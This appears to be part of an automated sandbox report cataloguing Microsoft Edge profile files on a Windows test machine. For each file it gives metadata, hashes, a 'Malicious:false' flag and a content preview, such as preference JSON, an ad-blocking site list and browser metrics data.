                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379149892090941","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"bc087678-5b99-4771-a549-04bf95f5d8e4"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\98d10a9a-c417-424b-b41e-19f54c9a3121.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):44922
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.09494174462605
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvYi1zNtPSN6IC6CsKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn/FKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:17DD9B46D87BDB86C4D0A7528A9FD28E
                                                                                                                                                                                                                                                                                                SHA1:41FFB886512F4C041D5C1F8EB6EBA62C0D594AE0
                                                                                                                                                                                                                                                                                                SHA-256:8567EBFEC30F1BE0B55CABECBE374A2EE98FF5E42DD4ED62D639D83B94C0332A
                                                                                                                                                                                                                                                                                                SHA-512:42D7DFCA272E2165299F690E55FC78783DA400DB6FC511120FC856C4AFE4A5435302B0D0302C3CCAF4028791420400AA4B3D2C1D52E127D559541710437E6B53
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\08190b15-55df-4444-aa62-2184910982ab.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                                MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                                SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                                SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                                SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                                MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                                SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                                SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                                SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                                                                MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                                                                MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67650F43-1F74.pma

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2048.000000, slope 17753217332035315519916605440.000000
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4488504092789271
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:Fzde/JLMZf0Whl3zxdJBkcowJpN8C1DqKsOeWYHqefIjdug1HFL:ne/Apzxdfkcooyqs/WYHqefIjduaHl
                                                                                                                                                                                                                                                                                                MD5:CF520544FFBFDFABE3A11D423883B3ED
                                                                                                                                                                                                                                                                                                SHA1:8D202D3207EDD68D4F1B60DDD50A001997952B3A
                                                                                                                                                                                                                                                                                                SHA-256:C40463C91F0BE4669EBAB156D8A993FF0DCB6021E0F6C3A9DC5A16C0052E07CB
                                                                                                                                                                                                                                                                                                SHA-512:65390FF6CC24BE39972CEC332D31066F096E8B635B9378D785E9173A60D47BF4CC65FE32C8EFA1B842CA8F5627D2AB4DF0031514DFCC10C18BEDE1FE6FB9248E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@..................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".hkbytp20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........m...... .2........

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.0984945491284295
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                                                                                                                                MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                                                                                                                                SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                                                                                                                                SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                                                                                                                                SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1b9f6131-f106-4f46-8342-ab62ccba381c.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40504
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.561168251614602
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:YQUNOrWyT7pLGLh+UW5wcOf4Ht8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPQE/QIGLo:Y3IrNFch+UWacOfItu1jahE/0BrDbPvy
                                                                                                                                                                                                                                                                                                MD5:BA1D864870153BAA860CFC2F9216309B
                                                                                                                                                                                                                                                                                                SHA1:575F7D4DD59A1BD7F97B297DF081E311B4DFAF69
                                                                                                                                                                                                                                                                                                SHA-256:2B787F974C71764B0472BFC112570640AD2116A0ECF6612F2A75717BABAE6064
                                                                                                                                                                                                                                                                                                SHA-512:8477CDB1CA5D2502F5126DCDEC944B11894620BAD968F613AB33E6B59D7635D17121EE6299EB209882AC35E5B4A87848AC7F2B0ACAA9FAB5A631B210594DB8FE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379149891335447","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379149891335447","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\35941adc-eaf0-4eac-8655-e8ba7f0da391.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17806), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17810
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.4816310123184975
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEJ99QTryDiuabatSuypwseDBaFvrEWuEV6PkYNP9AUn9DDhKmwwDjNrQVs8Pb+:stEPGQSu4wseDBCDv/63hyygbGzQwA3g
                                                                                                                                                                                                                                                                                                MD5:844C193E6A2C804148FD3ACEDF02DDD8
                                                                                                                                                                                                                                                                                                SHA1:0FB6F691D890475FA7B6FC0A4B76E5E1088D4F2E
                                                                                                                                                                                                                                                                                                SHA-256:544FBE08EA3D1AAF3A31FDA42BD62B77905C1C063428C7BA293E14A41C21EB2E
                                                                                                                                                                                                                                                                                                SHA-512:873388A2F622ED7D9DC06D10CDBBF6A4235CED3622EAD89306BB4055CDDFBC97AF914E085C82112F2813DFD350E00FF9445A72C850D3CDFA7ECFC46B844C30E9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\37ff41ba-8506-49ce-860c-105f54ae7afd.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\38d328e7-c858-4556-b6ff-9d7e8b0766dc.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17641), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17645
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.48490168947818
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEJ99QTryDiuabatSuypwseDBaFvrEWuEV6PkYNP9AUn9DDhKmwwDjNrQVs8Pbv:stEPGQSu4wseDBCDv/63hyygbGzQwRg
                                                                                                                                                                                                                                                                                                MD5:7AAF83E5608416F77939FDB88FC9AF37
                                                                                                                                                                                                                                                                                                SHA1:918F5BBA57D0327F978627F2B71F7C1D22D974BE
                                                                                                                                                                                                                                                                                                SHA-256:819499CDF394802C4BA4E24A51789EFC6E01CC7F3AB8800F2BBA4B63948F5E06
                                                                                                                                                                                                                                                                                                SHA-512:A29EF1E66F3B177A14EF2863E6AB6909E4A110ABEC0D8571050898830094604576A8E8CD8F8EFB803FC3A0849777982CB16E1AD617BA05A62CAC5FA73B8A9BED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9e5686c7-05f9-4b76-8548-e52984290c9e.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17456), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17460
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.486521170609004
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEJ99QTryDiuabatSuypwseDBaFvrEWuEV6PkYNP9AUn9DDhKmwwDjN5s8PbV+T:stEPGQSu4wseDBCDv/63hyyxbGzQweg
                                                                                                                                                                                                                                                                                                MD5:9425123D08A078375E81682987485E64
                                                                                                                                                                                                                                                                                                SHA1:EA37FFAF22A3BF86AC81C4A5D4586C17C43F0E0A
                                                                                                                                                                                                                                                                                                SHA-256:CBB6371967D256DD33AEEF92ACA0FAEEE5DE55ABE69594865F51F25D9D340A39
                                                                                                                                                                                                                                                                                                SHA-512:0FCEBF094982837FC16557ED7828D2B58C1AE1D1D2000BC8B8114683259CD2B726EAA30A0E8612354E7F6B1CFA525DD2F0C35286D0B4F0F6F33AC11E5BC96110
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9f67f510-efca-4334-add8-9629edd77f12.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17806), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17810
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.481652532656254
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEJ99QTryDiuabatSuypwseDBaFvrEWuEV6PkYNP9AUn9DDhKmwwDjNrQVs8PbH:stEPGQSu4wseDBCDv/63hyygbGzQwz3g
                                                                                                                                                                                                                                                                                                MD5:E94C549C73038D6294FF3A2EB20EF74B
